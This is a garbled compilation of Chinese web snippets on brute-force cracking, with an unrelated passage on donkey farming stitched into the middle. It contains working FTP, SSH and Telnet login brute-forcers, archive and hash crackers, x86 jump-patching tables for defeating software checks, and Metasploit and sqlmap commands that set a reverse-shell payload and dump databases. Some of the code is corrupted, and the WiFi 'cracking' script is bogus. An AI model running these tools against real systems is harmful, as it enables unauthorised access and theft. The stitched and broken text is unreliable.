暴力破解代码

Python之如何暴⼒破解加密⽂件背景介绍：在⼯作中我们可能会遇到⼀些加密过的压缩⽂件，如果需要获取压缩⽂件的内容，必须先解密，然⽽仅凭⼿动去尝试肯定是不⼤可能的，那么我们借助 Python 来实现会极⼤的增加破解成功的可能性。

Python 代码实现如下：1import zipfile2import rarfile3import time45def extractFiles(filename):6#记录开始时间7 start_time = time.time()89#判断压缩包类型并读取压缩包10if(filename.endswith(".zip")):11 fp=zipfile.ZipFile(filename,'r')12if(filename.endswith(".rar")):13 fp=rarfile.RarFile(filename,'r')1415#读取密码本⽂件16try:17 passwdfiles=open("passwd.txt")18except:19print("the file not found")2021#遍历密码本中的每⼀⾏密码去匹配 zip 加密⽂件22for line in passwdfiles.readlines():23 passwd= line.strip("\n")24# passwd=line25try:26#调⽤extractall来依次尝试密码27 fp.extractall(path='.',pwd=passwd.encode("utf-8"))28print("the %s of passwd is right"%passwd)29except:30print("the %s of passwd is wrong"%passwd)3132# 记录结束时间33 end_time = time.time()34print('破解压缩包花了%s秒' % (end_time - start_time))3536if__name__ == '__main__':37 extractFiles("test.zip")⼩结：上述⽰例代码适合以.zip和.rar两种格式结尾的压缩⽂件的解密，其主要思路是循环使⽤密码本中的每⼀⾏密码尝试进⾏压缩⽂件的解密操作，最后记录整个解密过程共花费的时长，以秒为单位。

连续相同字母的子串最大长度连续相同字母的子串最大长度是一个经常在编程中遇到的问题。

这个问题可以通过各种算法和技巧来解决。

在本文中，我将介绍一些常见的解决方法，并提供一些代码示例来帮助读者更好地理解。

一种最简单的方法是使用暴力破解法。

这种方法的思路是使用两个嵌套的循环来遍历字符串中的每个字符，并比较它与相邻字符是否相同。

如果相同，则增加计数器的值，并与之前的最大长度进行比较，更新最大长度。

以下是使用暴力破解法求解连续相同字母子串最大长度的示例代码：```pythondef max_length(string):max_len = 0for i in range(len(string)):count = 1for j in range(i+1, len(string)):if string[j] == string[i]:count += 1else:breakmax_len = max(max_len, count)return max_len```这个方法的时间复杂度是O(n^2)，其中n是字符串的长度。

尽管它的效率不高，但是在一些简单的应用场景中仍然是可行的。

另一种方法是使用动态规划。

动态规划的思路是将问题划分为子问题，并使用递推公式来计算问题的解。

对于这个问题，我们可以定义一个状态数组dp，其中dp[i]表示以字符string[i]结尾的连续相同字母子串的最大长度。

递推公式为：```dp[i] = dp[i-1] + 1 if string[i] == string[i-1]dp[i] = 1 otherwise```以下是使用动态规划求解连续相同字母子串最大长度的示例代码：```pythondef max_length(string):n = len(string)dp = [0] * ndp[0] = 1for i in range(1, n):if string[i] == string[i-1]:dp[i] = dp[i-1] + 1else:dp[i] = 1return max(dp)这个方法的时间复杂度是O(n)，相对于暴力破解法有较大的优势。

关于暴力破解中所用到的汇编指令机器码知识
我们在暴力破解中修改的对象基本上都是条件跳转指令(如 JZ、JNZ、JG。

等等)和无条件跳转指令JMP，对于其它地方的修改多数都是改成NOP，所以这里主要讲一下跳转指令对应的机器码。

在80X86 体系的CPU中，成对条件跳转指令(指的是判断条件刚好相反)如下所示：
JZ<-->JNZ
JE<-->JNE
JB(JNAE)<-->JNB(JAE)
JC<-->JNC
JA(JNBE)<-->JNA(JBE)
JG(JNLE)<-->JNG(JLE)
JL(JNGE)<-->JNL(JGE)
JS<-->JNS
JP(JPE)<-->JNP(JPO)
JO<-->JNO
80X86体系CPU中的条件跳转指令分为单字节和双字节指令两种，分别对应8BIT和16BIT跳转；而与条件跳转指令相匹配的无条件跳转指令 JMP也有单字节和双字节指令两种，分别对应8BIT和16BIT跳转，当我们需要将条件跳转指令改成相应的无条件跳转指令时，因为要保持修改前后机器码长度的一致性，所以要注意被修改的条件跳转指令是单字节还是双字节指令，从而用相应字节的JMP机器码来代替，下表列出了暴力破解中条件跳转指令的修改方法：
关于跟踪程序时如何在Softice中动态改变条件跳转指令的执行方向：
还有一种方法是用鼠标点击寄存器窗口的EIP，然后直接输入目标代码的IP地址就可以了，不过使用这个方法时要小心，否则使程序跑飞就完蛋了！。

简单的黑客装逼代码黑客装逼代码是指用代码展示黑客技术或模拟黑客攻击的情景，用来给人一种黑客高手的印象。

在编写黑客装逼代码时，需要注意合法性和道德性，避免给他人造成损失或引起不良影响。

以下是一些相关参考内容，不含链接。

1. 网络扫描器代码：```pythonimport sockettarget_ip = input("请输入目标IP地址：") # 输入目标IP地址for port in range(1, 1000): # 扫描1-1000端口sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) result = sock.connect_ex((target_ip, port))if result == 0:print(f"端口号 {port} 开放")sock.close()```该代码实现了一个简单的网络扫描器，可以用来扫描目标主机的开放端口。

运行代码后，用户输入目标IP地址，代码将自动扫描该主机的1-1000端口，并输出开放的端口号。

2. 密码破解代码：```pythonimport hashlibtarget_password_hash = input("请输入目标密码哈希值：") # 输入目标密码的哈希值password_file = input("请输入密码字典文件：") # 输入密码字典文件名with open(password_file, 'r') as f:for password in f:password = password.strip()password_hash =hashlib.sha256(password.encode()).hexdigest() # 对密码进行哈希if password_hash == target_password_hash:print(f"密码破解成功，密码为：{password}")break```该代码可以从一个密码字典文件中逐个尝试密码，并对密码进行哈希后与目标密码的哈希值进行比较，以此来破解密码。

我们在暴力破解中修改的对象基本上都是条件跳转指令(如JZ、JNZ、JG。

等等)和无条件跳转指令JMP，对于其它地方的修改多数都是改成NOP，所以这里主要讲一下跳转指令对应的机器码。

在80X86 体系的CPU中，成对条件跳转指令(指的是判断条件刚好相反)如下所示：JZ <--> JNZJE <--> JNEJB(JNAE) <--> JNB(JAE)JC <--> JNCJA(JNBE) <--> JNA(JBE)JG(JNLE) <--> JNG(JLE)JL(JNGE) <--> JNL(JGE)JS <--> JNSJP(JPE) <--> JNP(JPO)JO <--> JNO80X86体系CPU中的条件跳转指令分为单字节和双字节指令两种，分别对应8BIT和16BIT跳转；而与条件跳转指令相匹配的无条件跳转指令JMP也有单字节和双字节指令两种，分别对应8BIT和16BIT跳转，当我们需要将条件跳转指令改成相应的无条件跳转指令时，因为要保持修改前后机器码长度的一致性，所以要注意被修改的条件跳转指令是单字节还是双字节指令，从而用相应字节的JMP机器码来代替，下表列出了暴力破解中条件跳转指令的修改方法：8位跳转指令修改方法汇编指令机器码相反汇编指令机器码测试标志位改后的机器码对应汇编指令JZ ???????? JE ???????? 74 XXJNZ ????????JNE ????????75 XX Z = 0 或1EB XX JMP ????????JB ???????? JNAE ???????? 72 XXJNB ????????JAE ????????73 XX C = 0 或1JC ???????? 72 XX JNC ???????? 73 XX C = 0 或1JA ???????? JNBE ???????? 77 XXJNA ????????JBE ????????76 XXZ OR C = 0 或1JG ???????? JNLE ???????? 7F XXJNG ????????JLE ????????7E XX(S XOR O) ORZ = 0 或1JL ???????? JNGE ???????? 7C XXJNL ????????JGE ????????7D XXS XOR O = 0或1JS ???????? 78 XX JNS ???????? 79 XX S = 0 或1JP ???????? JPE ???????? 7A XXJNP ????????JPO ????????7B XX P = 0 或1JO ???????? 70 XX JNO ???????? 71 XX O = 0 或116位跳转指令修改方法汇编指令机器码相反汇编指令机器码测试标志位修改后的机器码对应的汇编指令JZ ???????? JE ???????? 0F 84XXJNZ ????????JNE ????????0F 85 XX Z = 0 或190 EB XXNOPJMP ????????JB ???????? JNAE ???????? 0F 82XXJNB ????????JAE ????????0F 83 XX C = 0 或1JC ???????? 0F 82XXJNC ???????? 0F 83 XX C = 0 或1JA ???????? JNBE ???????? 0F 87XXJNA ????????JBE ????????0F 86 XX Z OR C = 0 或1JG ???????? JNLE ???????? 0F 8FXXJNG ????????JLE ????????0F 8EXX(S XOR O) OR Z= 0 或1JL ???????? JNGE ???????? 0F 8CXXJNL ????????JGE ????????0F 8DXXS XOR O = 0 或1JS ???????? 0F 88XXJNS ???????? 0F 89 XX S = 0 或1JP ???????? JPE ???????? 0F 8AXXJNP ????????JPO ????????0F 8BXXP = 0 或1JO ???????? 0F 80XXJNO ???????? 0F 81 XX O = 0 或1关于跟踪程序时如何在Softice中动态改变条件跳转指令的执行方向：其实这个问题我已经在“破解常见问题/技巧”中仔细讲过，可还是老有人来问，现在再次将相应的Softice列出来！跳转指令测试标志Softice命令JZ、JNZ、JE、JNE Z=0或1 R FL=ZJB、JNB、JAE、JNAE、JC、JNC C=0或1 R FL=CJA、JNBE Z OR C = 0 R FL=+Z 或R FL=+C 或R FL=+Z+C JNA、JBE Z OR C = 1 R FL=-Z-CJG、JNLE (S XOR O)OR Z = 0R FL=+Z 或R FL=+S-O 或RFL=-S+O 或R FL=+S-O+Z 或RFL=-S+-O+ZJNG、JLE (S XOR O)OR Z = 1R FL=+S+O-Z 或R FL=-S-O-ZJGE、JNL S XOR O =R FL=+S-O 或R FL=-S+OJL、JNGE S XOR O =1R FL=+S+O 或R FL=-S-OJS、JNS S=0或1 R FL=SJO、JNO O=0或1 R FL=OJP、JPE、JNP、JPO P=0或1 R FL=P还有一种方法是用鼠标点击寄存器窗口的EIP，然后直接输入目标代码的IP地址就可以了，不过使用这个方法时要小心，否则使程序跑飞就完蛋了！。

csdn 破译6位密码 python原理
要破译一个6位密码，可以使用暴力破解的方法，即尝试所有可能的组合。

首先，确定密码的字符集。

一般来说，6位密码的字符集包括
数字0-9和大小写字母a-z和A-Z，一共62个字符。

然后，利用Python的循环嵌套生成所有可能的6位密码组合。

可以使用6个循环来生成密码的每个位置上的字符，每个循环波动一位的字符的选择，从字符集中选择一个字符。

示例代码如下：
```python
import string
import itertools
# 定义密码字符集
charset = string.digits + string.ascii_letters
# 生成所有可能的6位密码组合
for p in itertools.product(charset, repeat=6):
password = ''.join(p)
print(password)
# 在这里可以添加破译的逻辑，例如与目标密码进行比对
# 如果破译成功，可以停止循环或进行其他处理
```
注意，由于密码有6位，字符集有62个字符，总共的组合个数为62^6，即56800235584个，因此暴力破解这么大的组合数量会非常耗时，在实际应用中可能并不可行。

因此，建议进行破解时根据实际情况选择更加高效的方法，例如利用已知信息、密码弱点等进行分析和优化。

md5crack使用方法MD5Crack是一款用于破解MD5加密的工具，它可以帮助用户快速破解MD5加密的密码。

下面是MD5Crack的使用方法。

第一步：下载MD5Crack用户可以在互联网上搜索MD5Crack并下载安装包，也可以在GitHub上找到MD5Crack的源代码并自行编译。

第二步：打开MD5Crack打开MD5Crack后，用户需要输入要破解的MD5加密字符串。

用户可以手动输入，也可以从文件中导入。

第三步：选择破解方式MD5Crack提供了多种破解方式，包括暴力破解、字典破解、混合破解等。

用户可以根据自己的需求选择不同的破解方式。

暴力破解：MD5Crack会尝试所有可能的字符组合，直到找到正确的密码。

这种方式需要耗费大量时间和计算资源。

字典破解：MD5Crack会使用一个包含常用密码的字典文件进行破解。

用户可以自己编写字典文件，也可以从互联网上下载。

混合破解：MD5Crack会结合暴力破解和字典破解两种方式进行破解。

这种方式可以提高破解速度和成功率。

第四步：开始破解选择好破解方式后，用户可以点击“开始破解”按钮开始破解。

MD5Crack会根据用户选择的破解方式进行破解，并在破解成功后显示密码。

总结：MD5Crack是一款功能强大的MD5破解工具，它可以帮助用户快速破解MD5加密的密码。

用户只需要输入要破解的MD5加密字符串，选择破解方式，点击“开始破解”按钮即可开始破解。

但需要注意的是，MD5Crack只能破解MD5加密的密码，对于其他加密方式无能为力。

同时，使用MD5Crack进行破解需要遵守法律法规，不得用于非法用途。

肉驴养殖发展趋势驴在我国农牧业生产中曾占据重要的地位，随着农牧业机械化取代传统农耕生产与运输，驴最主要的役用功能渐渐退出历史舞台，从而影响了农牧民养殖乐观性，造成存栏量渐渐下降。

由于膳食结构的转变及驴经济价值的提高，人们对驴有了进一步熟悉。

通过对驴的资源调查、品种爱护、选育改良、繁殖技术、育肥技术、饲养管理、产品开发等方面的讨论，推出了新产品，扩大了驴肉消费市场。

以下对肉驴养殖进展趋势分析。

据2022-2023年中国肉驴养殖行业市场深度分析及投资战略讨论报告显示，有关部门对我国15个城市的6种驴产品市场调查显示，从2000年至今，连续8年销量逐年增长，价格一路走高。

由于毛驴存栏数逐年走低，导致驴产品严峻短缺，市场缺口在50%以上，价格平均上涨100%以上。

肉驴养殖与其他动物养殖相比，易饲养，爱吃农作物秸杆，牧草，野草等，食量小，仅相当于牛的1/3，养殖成本低。

养驴风险小，疾病少，驴肉市场行情好，市场价格普遍比牛、羊肉略高。

现从四大市场行情来分析肉驴养殖进展趋势。

1、需求不断增加需求不断增加是养驴业景气的重要保障，往前推20年吃个猪肉、鸡肉就不错了。

现在是吃驴肉、牛肉是种养生了，随着社会的进展，人们的生活提高。

消费倾向逐步向绿色养生方向转移了，肉驴吃的是草长得是肉，是绿色食品更利于人的身体健康。

驴肉细嫩味美，素有“天上龙肉，地下驴肉”的美称，颇受消费者青睐。

所以驴肉始终供不应求。

据肉驴养殖进展趋势调查显示，由于驴产品严峻短缺，市场缺口在70%以上，价格平均上涨40%左右，成为市场上的抢手俏货。

2、养殖管理成本低驴是食草动物，适应性极好，抗病力很强，简单管理，很适合创业者施展身手。

据肉驴养殖进展趋势相关专家与饲养羊、猪、鸡相比，养驴风险小，投资少，效益高。

驴的饲料来源也很广泛，即使牧草不足，也可以充分利用农作物秸秆，粮食下脚料等等都可以作为饲料。

用粮食等精饲料极少，饲养成本低。

而猪、鸡等都是耗粮型的养殖业，粮食消耗大，增肉量相对较小，经济效益低。

简单的黑客装逼代码引言黑客是指具有极高计算机技术水平的人，他们可以通过技术手段获取、修改、破解计算机系统和网络的信息。

在电影中，黑客常常以一种神秘而强大的形象出现，给人留下深刻印象。

本文将介绍一些简单的黑客装逼代码，帮助你在朋友面前展现出自己与众不同的技术能力。

1. 网络扫描网络扫描是黑客最常用的技术之一，它可以帮助黑客探测目标计算机系统和网络的漏洞，从而进行攻击。

下面是一个简单的Python脚本示例，可以用于进行端口扫描：import socketdef scan_ports(target, start_port, end_port):for port in range(start_port, end_port + 1):sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)result = sock.connect_ex((target, port))if result == 0:print(f"Port {port} is open")sock.close()if __name__ == "__main__":target = "127.0.0.1"start_port = 1end_port = 1000scan_ports(target, start_port, end_port)以上代码使用了socket模块来创建TCP连接并进行端口扫描。

你可以将target变量设置为目标主机的IP地址，start_port和end_port变量设置为你想要扫描的端口范围。

运行代码后，它将输出开放的端口号。

2. 密码破解密码破解是黑客入侵的一项重要技术，通过尝试各种可能的密码组合来获取未授权访问目标系统的权限。

下面是一个简单的Python脚本示例，可以用于暴力破解FTP服务器的登录密码：import ftplibdef brute_force_ftp(target, username_list, password_list):for username in username_list:for password in password_list:try:ftp = ftplib.FTP(target)ftp.login(username, password)print(f"Successful login with credentials: {username}:{passwor d}")ftp.quit()returnexcept ftplib.error_perm as e:print(f"Failed login with credentials: {username}:{password}")if __name__ == "__main__":target = "127.0.0.1"username_list = ["admin", "root"]password_list = ["123456", "password", "admin123"]brute_force_ftp(target, username_list, password_list)以上代码使用了ftplib模块来进行FTP登录，并尝试不同的用户名和密码组合。

简单黑客代码简单黑客代码是指能够让普通人轻松掌握的基础黑客技术，其中包含了一些简单却非常实用的代码，可以用于网络安全检测、漏洞利用和密码破解等方面。

在黑客领域，又称为“入门代码”或“初级代码”。

下面将就简单黑客代码作一简单介绍。

一、网络安全检测代码1. 网络Ping扫描代码在命令行下输入代码：ping -t 192.168.1.1，能够实现对局域网中指定地址的Ping扫描，定位网络故障。

2. 端口扫描代码使用Nmap扫描指定IP地址可知道该IP地址开放了哪些端口，留下了哪些漏洞。

使用黑客已经熟练掌握，这里只简单介绍Nmap命令行使用方法：nmap IP地址：对指定IP地址的端口进行扫描nmap -O IP地址：通过探测目标操作系统对端口进行扫描3. SQL注入漏洞检测代码使用SQLmap对目标网站进行扫描，获得数据库的结构、数据和管理员密码等敏感信息，实现轻松访问网站。

SQLmap使用方法：python sqlmap.py -u URL --dbs：扫描目标网站，获取目标数据库信息python sqlmap.py -u URL -D 数据库名 --tables：获取指定数据库的所有数据表二、漏洞利用代码1. Metasploit利用漏洞代码Metasploit是一个开源的渗透测试框架，包含超过1600种已知漏洞的利用模块。

Metasploit使用流程：msf > search 关键字：搜索系统有没有指定关键字相关的漏洞msf > use exploit/path/soon：选择一个漏洞利用模块msf > set payload payload/windows/meterpreter/reverse_tcp：设置payload上传反弹回来的shellmsf > set RHOSTS IP地址：设置目标主机IP地址msf > exploit：开始攻击2. 远程溢出漏洞利用代码使用Metasploit实现对远程主机的控制，即可进行任意操作。

Writer: demonalex[at]dark2s[dot]org讲到WEB暴力破解通过大家都会用小榕的溯雪，但并不是所有WEB破解溯雪都是应付自如的（不要说我说小榕他老人家的坏话），最近因为工作的关系，碰到一个网管型设备的WEBPORTAL需要做WEB破解，看看HTML的源码：…<script language=javascript>function login_send(){var f, p, page, url, option;f = document.form_login.forced_in.value;u = document.form_ername.value;p = document.form_login.passwd.value;pg = document.form_login.page.value;url ="atm_login?username="+u+"&passwd="+p+"&forced_in="+f+"&page="+ pg;option ="toolbar=no,location=no,directories=no,status=no,menubar=no,sc rollbars=no,favorites=no,resizable=no,left=230,width=520,top=1 20,height=300";window.open(url, '_blank', option);}</script>…<form name='form_login' action='__Javascript:login_send();'><input type='hidden' name='forced_in' value='false'><inputtype='hidden' name=page value=''><input type='hidden'name='redirect_portal_ip' value=''><tr height=25%><td colspan='2'><img src='images/login-men.gif' width='177' height='22'></td><td width='27%' rowspan='4'><img src='images/l-hand.gif'width='148' height='141'></td></tr><tr height=25%><td width='28%' class='inputlabel'>Username:</td> <td width='45%'><input name='username' type='text' value=''style='width:120px' class='inputbox'></td></tr><tr height=25%><td class='inputlabel'>Password:</td><td><input type='password' name='passwd' value=''style='width:120px' class='inputbox'></td></tr><tr height=25%><td> </td><td><input type=image src=images/login-go.gif width='71'height='22'></td></tr></from>…这里form的action是交给一个本地的javascript自定义函数-- login_send来完成的，用溯雪的话：看来是因为调用了javascript的关系吧…怎么办？就这样放弃吗？这也大可不必，调出wvs（Acunetix Web Vulnerability Scanner，相信都不少同志都用过它吧？我用的是4.0，目前最新的版本是5.x），选择它的HTTP fuzzer 功能：然后怎么使用它呢？我整理了一下流程（其实和溯雪的原理差不多，不过可能需要更深入的了解HTTP的相关知识）：定义HTTP请求（Request）-》定义暴破运算参数（Add generator）-》插入暴破运算参数（Insert into request）-》定义成功触发特征（Fuzzer Filters）-》扫描（Start）下面讲将具体实操，首先我们从目标的HTML代码可以看到，其实登陆过程是通过POST 的四个参数[--两个隐藏参数（forced_in与page）与两个提交参数（username与passwd）]至本页的login_send函数，然后再通过GET atm_login这个页面提交认证数据。

破解wifi密码的python3代码随着无线网络的普及，WiFi密码的保护变得越来越重要。

然而，有时我们可能会忘记自己的WiFi密码，或者想要测试自己的网络安全性。

在这种情况下，我们可以使用Python编写一个简单的程序来破解WiFi密码。

首先，我们需要导入所需的库。

在Python中，我们可以使用`subprocess`库来执行命令行操作，使用`re`库来进行正则表达式匹配。

```pythonimport subprocessimport re```接下来，我们可以定义一个函数来执行命令行操作并返回结果。

这个函数将接受一个命令作为参数，并使用`subprocess`库来执行该命令。

```pythondef run_command(command):result = subprocess.run(command, shell=True, capture_output=True, text=True)return result.stdout```然后，我们可以定义一个函数来破解WiFi密码。

这个函数将接受一个WiFi名称作为参数，并使用命令行工具`iwlist`来获取附近的WiFi网络列表。

```pythondef crack_wifi_password(wifi_name):networks = run_command("iwlist wlan0 scan | grep -ioE'ssid:\"[^\"]*\"'").split("\n")for network in networks:ssid = re.search('ssid:"(.*)"', network).group(1)if ssid == wifi_name:password = run_command(f"sudo iwlist wlan0 scan essid {ssid} | grep -ioE 'key:\"[^\"]*\"'")if password:return re.search('key:"(.*)"', password).group(1)return None```在这个函数中，我们首先使用`iwlist`命令来扫描附近的WiFi网络，并使用正则表达式匹配来提取网络的名称。

记录ssh暴⼒破解的密码字典之前我已经在wooyun和91ri上发表了这篇⽂章，今天转到51cto上。

默认的ssh⽇志是不带密码记录功能的，现在想把登录密码记录下来，这样就可以搜集⿊客的ssh爆破字典了，从⽽可以反扫回去。

具体⽅法就是给默认的ssh源码打个patch#wget /pub/OpenBSD/OpenSSH/portable/openssh-6.6p1.tar.gz#tar xzvf openssh-6.6p1.tar.gz#cd openssh-6.6p1在当前⽬录下创建⼀个patch⽂件sshlog.patch，代码如下：1 2 3 4 5 6 7 8 9 10--- auth-passwd.c 2014-05-25 19:51:28.000000000 -0400+++ auth-passwd-sshlog.c 2014-02-11 12:19:42.000000000 -0500 @@ -82,6 +82,7 @@{struct passwd * pw = authctxt->pw;int result, ok = authctxt->valid;+ logit("sshlog: %s %s", authctxt->user, password);#if defined(USE_SHADOW) && defined(HAS_SHADOW_EXPIRE)static int expire_checked = 0;#endif然后打patch#patch --dry-run < sshlog.patch#patch < sshlog.patch备份之前的ssh配置⽂件#mv /etc/ssh/ /etc/ssh_old编译安装ssh#./configure --prefix=/usr --sysconfdir=/etc/ssh --without-zlib-version-check --with-md5-passwords --mandir=/usr/share/man重新启动ssh服务/etc/init.d/sshd restartssh爆破时的密码会被记录在/var/log/message⽂件⾥可以看到此时服务器还在被爆破中…通过d3.js可以图形化爆破的次数更直观（以下服务器8天内被爆破的次数）有的朋友看完可能会有⼏点疑问：1. ⽇志⾥既可以记录暴⼒破解的密码那么也可以记录管理员登录的正确密码，如果被⿊客看到岂不是反⽽不安全？因为密码是存在 /var/log/messages⾥的，该⽂件的权限是600，也就是其他属主和组的⽤户是读不到的，除了超户意外，当然假如你的web 服务是root管理的，⽽这web服务⼜存在漏洞被拿下了，进⽽得到root权限了，那么谁也救不了了，所以应⽤程序还是要⽤普通⽤户来维护的安全。

Python脚本暴⼒破解栅栏密码今天遇到⼀个要破解的栅栏密码，先给⼤家介绍通⽤的脚本。

⽅法⼀(通⽤脚本)：#!/usr/bin/env python# -*- coding: gbk -*-# -*- coding: utf_ -*-e = raw_input(‘请输⼊要解密的字符串\n‘)elen = len(e)field=[]for i in range(,elen):if(elen%i==):field.append(i)for f in field:b = elen / fresult = {x:‘‘ for x in range(b)}for i in range(elen):a = i % b;result.update({a:result[a] + e[i]})d = ‘‘for i in range(b):d = d + result[i]print ‘分为\t‘+str(f)+‘\t‘+‘栏时，解密结果为： ‘+d⽅法⼆：FTP暴⼒破解脚本#!/usr/bin/env python#-*-coding = utf--*-#author:@xfk#blog:@/kaiyongdeng#date:@--import sys, os, timefrom ftplib import FTPdocs = """[*] This was written for educational purpose and pentest only. Use it at your own risk.[*] Author will be not responsible for any damage![*] Toolname : ftp_bf.py[*] Coder :[*] Version : .[*] eample of use : python ftp_bf.py -t -u usernames.txt -p passwords.txt"""if sys.platform == 'linux' or sys.platform == 'linux':clearing = 'clear'else:clearing = 'cls'os.system(clearing)R = "\[m";G = "\[m";Y = "\[m"END = "\[m"def logo():print G+"\n |---------------------------------------------------------------|"print " | |"print " | /kaiyongdeng |"print " | // ftp_bf.py v.. |"print " | FTP Brute Forcing Tool |"print " | |"print " |---------------------------------------------------------------|\n"print " \n [-] %s\n" % time.strftime("%X")print docs+ENDdef help():print R+"[*]-t, --target ip/hostname <> Our target"print "[*]-u, --usernamelist usernamelist <> usernamelist path"print "[*]-p, --passwordlist passwordlist <> passwordlist path"print "[*]-h, --help help <> print this help"print "[*]Example : python ftp_bf -t -u username.txt -p passwords.txt"+END sys.exit()def bf_login(hostname,username,password):# sys.stdout.write("\r[!]Checking : %s " % (p))# sys.stdout.flush()try:ftp = FTP(hostname)ftp.login(hostname,username, password)ftp.retrlines('list')ftp.quit()print Y+"\n[!] wt,wt We did it ! "print "[+] Target : ",hostname, ""print "[+] User : ",username, ""print "[+] Password : ",password, ""+ENDreturn# sys.exit()except Exception, e:pass except KeyboardInterrupt: print R+"\n[-] Exiting ...\n"+ENDsys.exit()def anon_login(hostname):try:print G+"\n[!] Checking for anonymous login.\n"+ENDftp = FTP(hostname) ftp.login()ftp.retrlines('LIST')print Y+"\n[!] wt,wt Anonymous login successfuly !\n"+ENDftp.quit()except Exception, e:print R+"\n[-] Anonymous login failed...\n"+ENDpassdef main():logo()try:for arg in sys.argv:if arg.lower() == '-t' or arg.lower() == '--target':hostname = sys.argv[int(sys.argv[:].index(arg))+]elif arg.lower() == '-u' or arg.lower() == '--usernamelist':usernamelist = sys.argv[int(sys.argv[:].index(arg))+]elif arg.lower() == '-p' or arg.lower() == '--passwordlist':passwordlist = sys.argv[int(sys.argv[:].index(arg))+]elif arg.lower() == '-h' or arg.lower() == '--help':help()elif len(sys.argv) <= :help()except:print R+"[-]Cheak your parametars input\n"+ENDhelp()print G+"[!] BruteForcing target ..."+ENDanon_login(hostname)# print "here is ok"# print hostnametry:usernames = open(usernamelist, "r")user = usernames.readlines()count =while count < len(user):user[count] = user[count].strip()count +=except:print R+"\n[-] Cheak your usernamelist path\n"+ENDsys.exit()# print "here is ok ",usernamelist,passwordlisttry:passwords = open(passwordlist, "r")pwd = passwords.readlines()count =while count < len(pwd):pwd[count] = pwd[count].strip()count +=except:print R+"\n[-] Check your passwordlist path\n"+ENDsys.exit()print G+"\n[+] Loaded:",len(user),"usernames"print "\n[+] Loaded:",len(pwd),"passwords"print "[+] Target:",hostnameprint "[+] Guessing...\n"+ENDfor u in user: for p in pwd:result = bf_login(hostname,u.replace("\n",""),p.replace("\n",""))if result != :print G+"[+]Attempt uaername:%s password:%s..." % (u,p) + R+"Disenable"+END else:print G+"[+]Attempt uaername:%s password:%s..." % (u,p) + Y+"Enable"+END if not result :print R+"\n[-]There is no username ans password enabled in the list."print "[-]Exiting...\n"+ENDif __name__ == "__main__":main()SSH暴⼒破解#!/usr/bin/env python#-*-coding = UTF--*-#author@:dengyongkai#blog@:/kaiyongdengimport sysimport osimport time#from threading import Threadtry:from paramiko import SSHClientfrom paramiko import AutoAddPolicyexcept ImportError:print G+'''You need paramiko module./paramiko/Debian/Ubuntu: sudo apt-get install aptitude: sudo aptitude install python-paramiko\n'''+ENDsys.exit()docs = """[*] This was written for educational purpose and pentest only. Use it at your own risk.[*] Author will be not responsible for any damage![*] Toolname : ssh_bf.py[*] Author : xfk[*] Version : v..[*] Example of use : python ssh_bf.py [-T target] [-P port] [-U userslist] [-W wordlist] [-H help]"""if sys.platform == 'linux' or sys.platform == 'linux':clearing = 'clear'else:clearing = 'cls'os.system(clearing)R = "\[m";G = "\[m";Y = "\[m"END = "\[m"def logo():print G+"\n |---------------------------------------------------------------|"print " | |"print " | /kaiyongdeng |"print " | // ssh_bf.py v.. |"print " | SSH Brute Forcing Tool |"print " | |"print " |---------------------------------------------------------------|\n"print " \n [-] %s\n" % time.ctime()print docs+ENDdef help():print Y+" [*]-H --hostname/ip <>the target hostname or ip address"print " [*]-P --port <>the ssh service port(default is )"print " [*]-U --usernamelist <>usernames list file"print " [*]-P --passwordlist <>passwords list file"print " [*]-H --help <>show help information"print " [*]Usage:python %s [-T target] [-P port] [-U userslist] [-W wordlist] [-H help]"+ENDsys.exit()def BruteForce(hostname,port,username,password):'''Create SSH connection to target'''ssh = SSHClient()ssh.set_missing_host_key_policy(AutoAddPolicy())try:ssh.connect(hostname, port, username, password, pkey=None, timeout = None, allow_agent=False, look_for_keys=False) status = 'ok'ssh.close()except Exception, e:status = 'error'passreturn statusdef makelist(file):'''Make usernames and passwords lists'''items = []try:fd = open(file, 'r')except IOError:print R+'unable to read file \'%s\'' % file+ENDpassexcept Exception, e:print R+'unknown error'+ENDpassfor line in fd.readlines():item = line.replace('\n', '').replace('\r', '')items.append(item)fd.close()return itemsdef main():logo()# print "hello wold"try:for arg in sys.argv:if arg.lower() == '-t' or arg.lower() == '--target':hostname = str(sys.argv[int(sys.argv[:].index(arg))+])if arg.lower() == '-p' or arg.lower() == '--port':port = sys.argv[int(sys.argv[:].index(arg))+]elif arg.lower() == '-u' or arg.lower() == '--userlist':userlist = sys.argv[int(sys.argv[:].index(arg))+]elif arg.lower() == '-w' or arg.lower() == '--wordlist':wordlist = sys.argv[int(sys.argv[:].index(arg))+]elif arg.lower() == '-h' or arg.lower() == '--help':help()elif len(sys.argv) <= :help()except:print R+"[-]Cheak your parametars input\n"+ENDhelp()print G+"\n[!] BruteForcing target ...\n"+END# print "here is ok"# print hostname,port,wordlist,userlistusernamelist = makelist(userlist)passwordlist = makelist(wordlist)print Y+"[*] SSH Brute Force Praparing."print "[*] %s user(s) loaded." % str(len(usernamelist))print "[*] %s password(s) loaded." % str(len(passwordlist))print "[*] Brute Force Is Starting......."+ENDtry:for username in usernamelist:for password in passwordlist:print G+"\n[+]Attempt uaername:%s password:%s..." % (username,password)+ENDcurrent = BruteForce(hostname, port, username, password)if current == 'error':print R+"[-]O*O The username:%s and password:%s Is Disenbabled...\n" % (username,password)+END # passelse:print G+"\n[+] ^-^ HaHa,We Got It"print "[+] username: %s" % usernameprint "[+] password: %s\n" % password+END# sys.exit()except:print R+"\n[-] There Is Something Wrong,Pleace Cheak It."print "[-] Exitting.....\n"+ENDraiseprint Y+"[+] Done.^-^\n"+ENDsys.exit()if __name__ == "__main__":main()TELNET密码暴⼒破解#!usr/bin/python#Telnet Brute Forcer##dhydr[at]gmail[dot]comimport threading, time, random, sys, telnetlibfrom copy import copyif len(sys.argv) !=:print "Usage: ./telnetbrute.py <server> <userlist> <wordlist>" sys.exit()try:users = open(sys.argv[], "r").readlines()except(IOError):print "Error: Check your userlist path\n"sys.exit()try:words = open(sys.argv[], "r").readlines()except(IOError):print "Error: Check your wordlist path\n"sys.exit()print "\n\t dhydr[at]gmail[dot]com TelnetBruteForcer v."print "\t--------------------------------------------------\n"print "[+] Server:",sys.argv[]print "[+] Users Loaded:",len(users)print "[+] Words Loaded:",len(words),"\n"wordlist = copy(words)def reloader():for word in wordlist:words.append(word)def getword():lock = threading.Lock()lock.acquire()if len(words) != :value = random.sample(words, )words.remove(value[])else:print "\nReloading Wordlist - Changing User\n"reloader()value = random.sample(words, )users.remove(users[])lock.release()if 